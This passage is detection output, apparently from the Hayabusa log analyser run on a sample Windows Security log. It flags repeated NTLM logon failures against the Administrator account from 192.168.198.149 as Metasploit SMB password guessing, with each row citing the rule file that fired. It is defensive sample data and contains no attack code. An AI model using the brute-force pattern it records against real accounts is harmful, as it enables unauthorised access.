Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
